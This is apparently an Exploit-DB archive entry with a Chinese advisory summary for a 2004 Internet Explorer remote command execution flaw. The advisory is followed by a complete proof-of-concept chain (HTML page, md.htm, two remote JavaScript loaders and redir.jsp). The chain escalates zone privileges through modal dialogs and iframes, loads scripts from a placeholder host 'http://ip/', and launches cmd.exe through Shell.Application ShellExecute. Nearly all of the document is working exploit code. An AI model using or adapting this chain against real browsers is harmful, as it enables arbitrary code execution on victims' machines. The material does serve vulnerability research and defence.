https://www.exploit-db.com/exploits/310
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-603

MicrosoftInternetExplorer是一款流行的WEB浏览器。MicrosoftInternetExplorer可能存在一个安全问题，远程攻击者可以利用这个漏洞以进程权限在系统上执行任意命令。攻击者可以构建恶意自执行HTML文件，嵌入滥用ShellHelper对象的脚本代码，获得一个快捷方式文件，更改它的属性，保存到磁盘，然后执行由快捷方式指向的文件，这可导致任意代码被执行。不过有测试者认为此漏洞只能工作在自执行文件在本地区域上下文件中运行。要远程在Intenet区域利用此漏洞，还必须结合其他跨站脚本相关漏洞才能实现。

<html>
<body>

<script language="Javascript">

function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000;dialogLeft:-10000;dialogHeight:1;
dialogWidth:1;").location="vbscript:"<SCRIPT SRC='http://ip/shellscript_loader.js'></script>"";
}

</script>

<script language="javascript">

setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.jsp" style=display:none;></IFRAME>');

</script>

</body>
</html>

--------------------------------------------------------- md.htm  ---------------------------------------------------------
<SCRIPT language="javascript">

window.returnValue = window.dialogArguments;

function CheckStatus(){
try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();}
setTimeout("CheckStatus()",100);
}

CheckStatus();

</SCRIPT>

--------------------------------------------------- shellscript_loader.js  ---------------------------------------------------
function getRealShell() {
myiframe.document.write("<SCRIPT SRC='http://ip/shellscript.js'></SCRIPT>");
}

document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);

------------------------------------------------------- shellscript.js  -------------------------------------------------------
function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language=
"JScript" DEFER>var obj=new ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c pause");</script>');
}
document.write('<iframe src="shell:WINDOWS\Web\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);

--------------------------------------------------------- redir.jsp  ----------------------------------------------------------
<% Thread.sleep(1500);
response.setStatus(302);
response.setHeader("Location", "URL:res://shdoclc.dll/HTTP_501.htm"); 
%>


# milw0rm.com [2004-07-09]

来源:BID
名称:9335
链接:http://www.securityfocus.com/bid/9335
来源:BUGTRAQ
名称:20040101Self-ExecutingHTML:InternetExplorer5.5and6.0Part
链接:http://www.securityfocus.com/archive/1/348688
来源：NSFOCUS
名称：5881
链接：http://www.nsfocus.net/vulndb/5881